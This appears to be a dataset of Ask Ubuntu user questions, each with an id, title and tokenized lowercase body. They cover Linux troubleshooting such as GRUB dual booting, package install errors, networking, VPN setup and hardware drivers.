465112	uefi dual booting windows 8.1 and ubuntu 14.04	i have raid 0 set up i have windows 8.1 with ubuntu 14.04 i can boot to both just fine but i have to do it in the uefi bios . i would like to have in a boot menu in grub is that possible ? i have tried a few workaround with no luck . in grub customizer it dose not show the uefi windows path at all . i tried some windows based editors but it just corrupts the boot loader . after i installed ubunte it would not load i had to run boot-repair i have added my grub config file im not a expert thanks # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=10 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=10 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux_proxy # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode # # # end /etc/grub.d/10_linux_proxy # # # # # # begin /etc/grub.d/30_uefi-firmware # # # menuentry 'system setup ' $ menuentry_id_option 'uefi-firmware ' { fwsetup } # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/33_linux_proxy # # # menuentry `` ubuntu '' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-944e1cb8-1584-4e54-8a27-455fe241fc21 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } submenu `` advanced options for ubuntu '' { menuentry `` ubuntu , with linux 3.13.0-24-generic '' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-944e1cb8-1584-4e54-8a27-455fe241fc21 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry `` ubuntu , with linux 3.13.0-24-generic ( recovery mode ) '' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-944e1cb8-1584-4e54-8a27-455fe241fc21 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/33_linux_proxy # # # # # # begin /etc/grub.d/34_linux_xen # # # # # # end /etc/grub.d/34_linux_xen # # # # # # begin /etc/grub.d/35_os-prober # # # menuentry 'ubuntu 14.04 lts ( 14.04 ) ( on /dev/mapper/pdc_ejjdbjffd5 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-simple-944e1cb8-1584-4e54-8a27-455fe241fc21 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } submenu 'advanced options for ubuntu 14.04 lts ( 14.04 ) ( on /dev/mapper/pdc_ejjdbjffd5 ) ' $ menuentry_id_option 'osprober-gnulinux-advanced-944e1cb8-1584-4e54-8a27-455fe241fc21 ' { menuentry 'ubuntu ( on /dev/mapper/pdc_ejjdbjffd5 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-24-generic.efi.signed -- 944e1cb8-1584-4e54-8a27-455fe241fc21 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( on /dev/mapper/pdc_ejjdbjffd5 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-24-generic.efi.signed -- 944e1cb8-1584-4e54-8a27-455fe241fc21 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ( on /dev/mapper/pdc_ejjdbjffd5 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/boot/vmlinuz-3.13.0-24-generic.efi.signed-root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro recovery nomodeset-944e1cb8-1584-4e54-8a27-455fe241fc21 ' { insmod part_gpt insmod ext2 if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 else search -- no-floppy -- fs-uuid -- set=root 944e1cb8-1584-4e54-8a27-455fe241fc21 fi linux /boot/vmlinuz-3.13.0-24-generic.efi.signed root=uuid=944e1cb8-1584-4e54-8a27-455fe241fc21 ro recovery nomodeset initrd /boot/initrd.img-3.13.0-24-generic } } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/35_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
465115	wifi connection problem via sonicwall	i have been connecting my laptop ( still running 13.10 ) via sonic wall using both wi-fi and the hardware cable for a long time . recently its not connecting . it will just try to connect for some time and then will show that no connection is available . sadly there is no problem in connecting a windows system . this problem is not unique to my own system . other ubuntu systems are also having this problem .
465116	how do you use notify osd in razor qt ?	is it possible to set razor qt to use notify-osd instead of its built in notification system ?
465117	ubuntu along side windows 7	i downloaded from the official website . i burned correctly the dvd with ubuntu , i restart my computer and just like the installation instructions says i saw the welcoming screen , my problem is : installation type it only gives me 2 options : `` replace windows 7 '' , or `` something else '' . it says nothing about `` install ubuntu along side windows 7 '' like one of the images in the instructions says . i do n't understand what is happening , one more thing , from the dvd i burned i 'm trying ubuntu but how do i exit ? ? eject the dvd and then go back to windows . thanks guys
465122	triple boot ubuntu 14.04/windows 8/ ubuntu 12.04 lts	i apologize in advance if this question has already been answered . i already have windows 8 and ubuntu 14.04 installed and running . is it possible to then install another ubuntu along side them . do i have to mess with the partitions , with gparted , before using the install disk ? please help .
465126	openssh-server error e : sub-process /usr/bin/dpkg returned an error code ( 1 )	trying to install openssh-server on my system i got this following errors : root @ user-desktop : /home/user # sudo apt-get install openssh-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : ssh-import-id suggested packages : rssh molly-guard openssh-blacklist openssh-blacklist-extra monkeysphere the following new packages will be installed : openssh-server ssh-import-id 0 upgraded , 2 newly installed , 0 to remove and 706 not upgraded . need to get 346 kb of archives . after this operation , 881 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ph.archive.ubuntu.com/ubuntu/ precise-updates/main openssh-server amd64 1:5.9p1-5ubuntu1.4 [ 339 kb ] get:2 http : //ph.archive.ubuntu.com/ubuntu/ precise/main ssh-import-id all 2.10-0ubuntu1 [ 6,598 b ] fetched 346 kb in 5s ( 59.8 kb/s ) preconfiguring packages ... selecting previously unselected package openssh-server . ( reading database ... 147510 files and directories currently installed . ) unpacking openssh-server ( from ... /openssh-server_1 % 3a5.9p1-5ubuntu1.4_amd64.deb ) ... selecting previously unselected package ssh-import-id . unpacking ssh-import-id ( from ... /ssh-import-id_2.10-0ubuntu1_all.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for ufw ... processing triggers for man-db ... setting up openssh-server ( 1:5.9p1-5ubuntu1.4 ) ... creating ssh2 rsa key ; this may take some time ... creating ssh2 dsa key ; this may take some time ... creating ssh2 ecdsa key ; this may take some time ... useradd : can not lock /etc/gshadow ; try again later . adduser : `/usr/sbin/useradd -d /var/run/sshd -g nogroup -s /usr/sbin/nologin -u 229 sshd ' returned error code 10 . exiting . dpkg : error processing openssh-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up ssh-import-id ( 2.10-0ubuntu1 ) ... errors were encountered while processing : openssh-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
465128	protection for rm	i sometimes work with my server over ssh . i do n't want to lose anything because of an accidental rm . is there a way of creating a trashbin for my server ? i know it sounds stupid , but i just want to know whether there 's a way of recovering stuff if i accidentally delete files . i thought about adding a new alias for rm , but this wo n't always work . i sometimes use sftp package of sublime , and i also can accidentally delete stuff using it . what can i do ? thank you very much in advance .
465129	how to mount .vhdx image in lubuntu	so , i had a hard drive with windows 8 . the drive started dying , so i made an image backup to an external hdd . because it 's practically impossible to get an iso of windows 8 , i installed lubuntu . now i 'm restoring the backup and moving my files into lubuntu , but ca n't figure out how to mount a .vhdx image . how do i do this ?
465131	system monitor says that it recieves data under resources tab , while is disconnected from internet . what does this mean ?	i have noticed that my laptop receives small packages ( 1.3kb per sec ) constantly ... is it normal ?
465132	ubuntu 14.04 lts desktop not initialized	i recently upgraded to ubuntu 14.04 lts , but suddenly my desk top just stopped initializing.could you please assist in restoring it . regards
465135	eclipse not working : exec format error	i have installed eclipse as following : 1 → download eclipse-standard-kepler-sr2-linux-gtk-x86_64.tar.gz to my 14.04 2 → extracted it using the command , sudo tar -xvf eclipse-standard-kepler-sr2-linux-gtk-x86_64.tar.gz 3 → moved eclipse to /opt/ using command , sudo mv eclipse /opt/ 4 → created icon ( 64x64 ) for eclipse using gimp image editor . 5 → installed gnome-panel using , sudo apt-get install -- no-install-recommends gnome-panel 6 → and create application by using , sudo gnome-desktop-item-edit /usr/share/applications/ -- create-new 7 → select icon , 8 → select eclipse application for comment , 9 → finally enter command and click ok . i have given everything required , and the application created and showing , but when i open this application it 's not working . ( note : i have created another one , because first one not worked , and now both not working . that why picture showing two eclipse . ) when i tried to open it in terminal , i got bash : /opt/eclipse/eclipse : can not execute binary file : exec format error please tell me where the problem may occur ?
465136	laptop keyboard and touchpad disabled on startup	i use ubuntu 14.04 lts on my toshiba satellite l775d laptop . 14.04 is the only operating system installed . i am new to linux and only barely scratching the surface of doing things in terminal . when i boot my laptop keyboard and touchpad are disabled ( 99.99 % of the time ) if i do nothing . the only direct effect i can have is to keep pressing the `` numlock '' key during boot when i notice the `` numlock '' light goes off . if i do this then i have a 95 % chance of the keyboard and touchpad working when i am in the operating system . i am able to use my wireless mouse regardless . i have not seen any messages during boot . previously i have tried playing with input method settings and utilities as well as language support settings . this same problem exists with the 12 ... . and 13 ... versions of ubuntu . with everything i have tried ( from looking at other posts/suggestions ) it seems i can have only a temporary effect . please help me find a permanent solution to this problem . thank you .
465137	visual cpu indicator for trusty tahr ( with dual/multi-core support ) ?	a quick finger exercise with google returned the following : cpufreq indicator fossfreedom 's fork of system monitor indicator , probably looking like this ( non-visual ) neither of which seem to be both visual ( `` breathing '' -bar-chart-like ) multi/dual-core compatible ( i.e. , showing a bar-chart for each cpu ) i 'm not after the feature of manually changing the cpu frequency ( but do n't mind if it ships , too ) .
465143	mts mblaze 3.5g+ india , wireless modem isnt detectable in 12.04/14.04 lts ?	i am a beginner in linux , i do n't know any commands or do n't have any experience or expertise in linux . so while giving solution kindly consider me as a rookie and detailed commands/procedures . i thank in advance for all & any who try to solve my problem.. god bless all.. i have installed ubuntu 12.04 ( currently on the system ) along with windows xp sp3 . after the ubuntu started i followed basic procedures to install modem via the manufacturers of the broadband company , which is given below . ( here 1 thing i forgot to mention was , the modem and cd drive was not shown while opening the ubuntu 's explorer or whatever you call it . but when i opened disks app via dash both the drive were shown . so i copied the required linux driver given in the modem and copy pasted it from xp 's desktop which i had copied on it ) special user guide for ubuntu 12.4 & above versions notice : this user guide is used for below special case your linux os hasn’t installed any dial up tool yet , and also you have no other way to connect with internet to get them , then please refer to the following instruction to configure you pc/laptop and surf internet . add driver • open the terminal : applications- > accessories- > terminal • input the following command : sudo modprobe usbserial vendor=0x1bbb product=0x0012 install connection files • cdrom will be shown when insert modem device to pc • mount cd-rom • copy linux folder to the desktop . then you will get the “linux” directory . • open the terminal and enter “linux” directory input sudo tar jxvf mts_alcatel.tar.bz2 -c /etc , install connection files create the connections • open network connections , select enable mobile broadband , and then select edit the connections . then enable mobile broadband enter the id & password for the modem etc . and then apply . the modem worked for the first time , but internet was so slow that firefox was just showing connecting to the internet.. and no improvement in loading a page or anything . then i unplugged the modem , since then till now it has been undetected by the ubuntu even after many reboots .
465146	wine : problem running game ( aion )	i have a problem running the game aion on wine . i have open drivers for my g card .
465147	noise removal from usb soundcard	i am using the syba usb soundcard for live audio from other audio sources like bluetooth or logitech mic . it 's working perfectly , i am able to hear the live audio of bluetooth and logitech from the usb soundcard . but the audio coming into the soundcard is not clear there is too much noise with the audio . the usb soundcard has two port one for speaker and another for mic . when i hear the audio without plugin the headphone into speaker only plugin the headphne to mic then the noise is not coming . but if i plugin the headphone in speaker port the noise coming is startrd . can i remove or control the noise coming into the soundcard. ? i am using the following ffmpeg command for recording : ffmpeg -loglevel warning -y -f v4l2 -s 544x288 -i /dev/video0 -vstats -vstats_file '/home/video-output//2014-05-13t07-18-37/left_cam-stats ' -f pulse -name 'unknown source 0 ' -i alsa_input.pci-0000_00_1b.0.analog-stereo -filter lowpass -f pulse -name 'left_mic 0 ' -i alsa_input.usb-046d_0823_d81a0330-00-u0x46d0x823_1.analog-stereo -f pulse -name 'right_mic 1 ' -i alsa_input.usb-046d_0823_4b709030-00-u0x46d0x823.analog-stereo -f pulse -name 'default 0 ' -i default -f mpegts -crf 20 -r 24 -pix_fmt yuv420p -vcodec libx264 -vprofile baseline -t 02:00:00 -map 0:0 -map 1:0 -map 2:0 -map 3:0 -map 4:0 /home/left_cam.mp4
465148	ftrace on ubuntu 12.04	i wish to work with ftrace on ubuntu and able to use trace-cmd ( http : //manpages.ubuntu.com/manpages/precise/en/man1/trace-cmd-start.1.html ) . but as per this http : //lwn.net/articles/365835/ , i want to manually access /sys/kernel/debug/tracing section . $ cd /sys/kernel/debug/ -bash : cd : /sys/kernel/debug/ : permission denied debugfs in mounted . $ mount |grep debugfs 15 : nodev on /sys/kernel/debug type debugfs ( rw ) please share your knowledge .
465150	how to make a custom command available in sftp	there are only few commands available in sftp environment . is it possible to make available any custom command in sftp . for example any other executable ( that is not available by default ) , or any shell script or alias .
465151	lost data at cp -r < from source > < to destination > how to do recovery	i took a backup into external hard disk and moved all of them to my new ubuntu machine location /tmp which is near around 100 gb . and i moved via command prompt cp -r /tmp /home the folder into my /home folder . but my /home location had low space . but source folder size is 7.7 gb and designation /home is 4 gb . i forget to notice that at the time of coping . when i start coping i got some low space message and the action stopped . after error message i could n't see my source files . please forgive me if make any mistakes in this posting .
465153	installing windows 8.1 after ubuntu 14.04	so i 'm new to ubuntu and i want to dual boot it with windows 8.1 and so first i installed my ubuntu in my laptop and it is installed successfully ( i think ) so it 's working well now i have my windows 8.1 in my flashdrive and when i try to run the setup.exe i got this error : an error occured while loading your archive and so my question now : is it the same to make a dual boot from windows to ubuntu ? ( because mostly what i 've searched is from windows to ubuntu ) and in my case is ubuntu to windows ( i installed ubuntu first because in windows normally the second os will be the primary os ) e.g . when windows is installed and you try to install ubuntu and so the priority os now will be ubuntu . and i want to boot automatically to windows that 's why i installed the ubuntu first . how to install windows 8.1 now after installing ubuntu ? how to make partition in ubuntu ? looking forward . thanks !
465156	enabling ssl on squid	i installed squid server and i am trying to secure it . in many searches , i see that is possible to enable ssl for squid . is there any security benefits for squid server to enable ssl on it ?
465157	how do i partition an sd card with `` disk utility '' ?	i 'm using ubuntu 13.10 . i want to make partitions on my sd card . after mounting the sd card i 'm trying to make the partitions with the `` disk utility '' . in the disk utility , after clicking on `` more actions '' , the option for edit partitions is not displaying . how can i solve this problem ?
465158	encoding ogg vorbis sound file with avconv using same codec as audacity	for a website i am working on , i am trying to encode wav files to ogg ( vorbis ) using avconv . it seems like in some browsers , the resulting ogg files are not decoded properly . however , i figured out that if i encode my files using audacity , they work fine everywhere . i thought this might be a matter of which coded used , so i would like to know if there is a way to tell avconv to use the same codecs as audacity ! ? in case it can help , here is a bit more infos : the avconv command i am currently using : avconv -i sounds/wav/bass-0.wav -acodec libvorbis -q : a 5 sounds/ogg/bass-0.ogg and here is the output of avprobe comparing two files , the one on top is encoded with avconv , the one at the bottom with audacity : $ > avprobe sounds/ogg/bass-0.ogg ; avprobe sounds/ogg/bass-1.ogg avprobe version 0.8.10-6:0.8.10-0ubuntu0.13.10.1 , copyright ( c ) 2007-2013 the libav developers built on feb 6 2014 20:53:28 with gcc 4.8.1 input # 0 , ogg , from 'sounds/ogg/bass-0.ogg ' : duration : 00:00:03.75 , start : 0.000000 , bitrate : 142 kb/s stream # 0.0 : audio : vorbis , 44100 hz , stereo , s16 , 160 kb/s metadata : title : bass 01 itrk : 1 encoder : lavf53.21.1 avprobe version 0.8.10-6:0.8.10-0ubuntu0.13.10.1 , copyright ( c ) 2007-2013 the libav developers built on feb 6 2014 20:53:28 with gcc 4.8.1 input # 0 , ogg , from 'sounds/ogg/bass-1.ogg ' : duration : 00:00:03.75 , start : 0.000000 , bitrate : 120 kb/s stream # 0.0 : audio : vorbis , 44100 hz , stereo , s16 , 160 kb/s metadata : title : vox 05
465160	installing steamos on chromebook	i have ubuntu 12.04 with unity installed on my chromebook using crouton . to install steamos in unity normally , all you need to do is install steamos compositor and steamos modeswitch inhibitor and you can then choose the steamos gui from the login screen . i do n't have access to the login screen . logging out just closes ubuntu and takes me back to chromeos . running : ls -l /usr/share/xsessions/ gives me : -rw-r -- r -- 1 root root 134 oct 23 2013 steamos.desktop along with the similar gui info , so i know it 's there , i just do n't know how to switch to it .
465163	dhcp fails after initial reboot with `` no working leases in persistent database ''	i just installed ubuntu server 14.04 lts , overwriting 12.04 . the installation appears to proceed correctly . during the installation process the ip and hostname are correctly obtained via dhcp . however , when installation completes and the machine reboots ( removing the disc from the drive ) , the selected interface , eth0 does not obtain the ip . performing sudo ifdown eth0 & & sudo ifup eth0 and sudo dhclient -v eth0 both result in a bunch of dhcpdiscover messages and errors with : no dhcpoffers received . no working leases in persistent database /etc/network/interfaces ( untouched following fresh installation ) auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp the interface and cable were working fine with the previous ubuntu server 12.04 installation . any ideas on what to do ? this is a fresh install , and does n't obtain the ip immediately after the reboot initial reboot .
465166	failure during boot with service failures ( slowing down pc )	while ubuntu is starting and showing it 's boot screen an error occurs for several times saying : failed to execute 'lib/udev/socket:4/org/freedesktop/hal/udev_event ' 'socket:0/org/freedesktop/hal/udev_event ' : no such file or directory i do n't know where this comes from but would like to find out and make it stop . i just guessed it is a service so i grep for `` freedesktop '' : /etc/init.d % grep freede * dbus : -- dest=org.freedesktop.dbus \ dbus : / org.freedesktop.dbus.reloadconfig > /dev/null can someone help me getting rid of it ? do you need additional information ? because from time to time my pc just freezes for some seconds and comes back which might be up to the service trying to start over and over again ( after being blocked for some minutes due to it 's errors ) .
465167	how to setup a portable mail aggregator with web ui ?	i want to setup a mail collector , imap server and web mail viewer on my portable quantal ubuntu , and need some guidances to exactly which components is best and most efficient to serve the purpose . i am not familiar with the mail system and dns , so please be gentle . the purpose of this is keeping all mails offline and platform independent for a frequent traveller like myself , so i may access the mails from any devices ( tablet , smartphone , computer , etc . ) anytime i want within my private network . think of me traveling , got my very own hotspot router , connects the portable ubuntu to it , get on the internet , grabs emails from different accounts , keep them offline . then any other devices i connects to this router , whether router on internet or not , i get to access this portable ubuntu anytime and view my emails anytime . here are the main highlights i need to achieve : aggregate emails from different pop-based mail accounts to the imap server separate emails by account and categorize them in view ( message filters ) keep # of downloaded mail count per retrieval per email account port existing pst , dbx and thunderbird mails to this portable ubuntu view these emails from web ui possibly smtp ( optional if dns is required ) after some studies in stackexchange and internet tutorials , i think the following may work but unsure : nginx , dovecot , mysql , php-fpm , getmail4 , roundcubemail . the intent for dovecot is imap server , with web interface served by roundcubemail . using getmail4 to retrieve mails into imap server , then using roundcubemail to access them . questions : how to implement message filtering ( pt.2 above ) ? if they are within private network , can i skip dns setup , and access my portable server via ip or hostname set in dnsmasq within my private network router ? how to configure getmail4 to aggregate mails from different accounts and set them up so i could view them like the account profile in thunderbird client ? what is the best way to convert pst and dbx into mbox or maildir readable by dovecot ? how to port thunderbird mbox mail into dovecot ?
465168	can i recover a bitlocker-encrypted disk without the key ?	i have encrypted an external drive using bitlocker on windows 7 , i have lost the recovery key and since upgraded my pc with a new motherboard and processor . i have tried everything imaginable to recover my data , i have used passware etc and other forensic software packages but no joy . i have turned to ubuntu to hopefully resolve my issue . where i am at the moment is that i have installed the external hard drive directly on to my machine and have loaded ubuntu rev 14.04 . ubuntu recognises the drive in the disk management section but will not mount it . are there any packages i can use to decrypt my drive ? any help ( in basic instructions please ! ! pardon my ignorance ) would be greatly appreciated .
465171	openvpn setup with pia - connects but no internet	currently using ubuntu server 14.04 ( so no gui , all terminal ) sitting inside virtualbox , and am currently trying to get it to connect to private internet access using their vpn configs found here ( which can be downloaded without an account for those wanting to take a look at their opvm files ) . after downloading and extracting the zip file , i run for example `` sudo openvpn -- config france.opvm '' . this is the output . tue may 13 03:37:06 2014 udpv4 link local : [ undef ] tue may 13 03:37:06 2014 udpv4 link remote : [ af_inet ] 62.210.167.201:1194 tue may 13 03:37:06 2014 warning : this configuration may cache passwords in memory -- use the auth-nocache option to prevent this tue may 13 03:37:07 2014 [ private internet access ] peer connection initiated with [ af_inet ] 62.210.167.201:1194 tue may 13 03:37:09 2014 tun/tap device tun0 opened tue may 13 03:37:09 2014 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 tue may 13 03:37:09 2014 /sbin/ip link set dev tun0 up mtu 1500 tue may 13 03:37:09 2014 /sbin/ip addr add dev tun0 local 10.135.1.10 peer 10.135.1.9 tue may 13 03:37:09 2014 initialization sequence completed now , from what i understand , last line says connection is established . seconds and third last limes show openvpn creating the ip routes . if i run ifconfig , i can see there 's a new tun0 interface with a correct ip . tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.135.1.10 p-t-p:10.135.1.9 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:0 ( 0.0 b ) tx bytes:336 ( 336.0 b ) my issue is now however is that i have no internet access . ping does n't work and simply times out . what is it i 'm doing wrong that does n't allow me to have a connection ? any help is appreciated .
465172	ubuntu : unable to change background image after upgrading from mythbuntu to ubuntu-desktop	i 've been running mythbuntu 12.04 lts for a long time and had a specific background image that was set . yesterday i upgraded mythbuntu to 14.04 lts . today , i decided i wanted to switch my user interface to ubuntu 's default unity desktop . after running into issues with lightdm not showing the proper unity-greeter ( which is now fixed ) , i have the following issue once i 'm logged in : i ca n't change the background image to anything . i either get a black background or it shows the previous mythbuntu background . but i 'd like to switch the background image now and it does n't do anything . i have already tried deleting all hidden directories but to no avail . anyone able to lend me a hand with this issue ? or is this maybe a bug ?
465174	install and use compiz dim plugin without installing ccsm	is it possible to install and use the compiz dim plugin without installing ccsm ? i 'm trying to keep the number of packages installed to a minimum .
465177	xubuntu requirements	i plan to install xubuntu on my cpu that has the following specs : intel pentium ( r ) 4 2.26 ghz , 1.00 gb of ram . would the xubuntu trusty tahr support my cpu or do i have to use the precise pangolin version ?
465179	is there any alternative for zoomit on ubuntu ?	the drawing mode provided by zoomit is wonderful during a presentation . is there any software on ubuntu that provides the same functionality ?
465180	ubuntu 12.04 server for arm	i 'm looking to download ubuntu 12.04 server for arm but i ca n't find it under the arm image web folder ( i found only uimage and uinitrd ) . thanks .
465182	installing commerce kickstart into ubuntu	i would like to install drupal commerce kickstart into virtual box guest ubuntu 12.04 via drush or by any other method . i have searched long and wide , but have yet to find any information as to how to install on ubuntu or other linux distros . it s seem all installation methods are for windows and osx . any information or direction will be greatly appreciated . thanks so much ! oscar
465183	how to convert rsa key to pem using x.509 standard	i 've converted an rsa key to pem using the following command openssl rsa -in ~/.ssh/id_rsa -outform pem > id_rsa.pem however when i try uploading this key to my ubuntu server hosted on azure i get an error the certificate is in an invalid format . x.509 standard format in a .cer or .pem file is supported . what is the correct way of converting an rsa key to pem format ?
465189	if i manually install a .deb file will the package manager take care of future updates ?	if i download and install a .deb from a website and later that version , or a newer one , is added to the ubuntu repositories , what happens ? will it update with the repository version , or remain with the installed version . this looks somewhat relevant but is unconfirmed as an answer and is referring to synaptic specifically : updates of manually installed packages thanks !
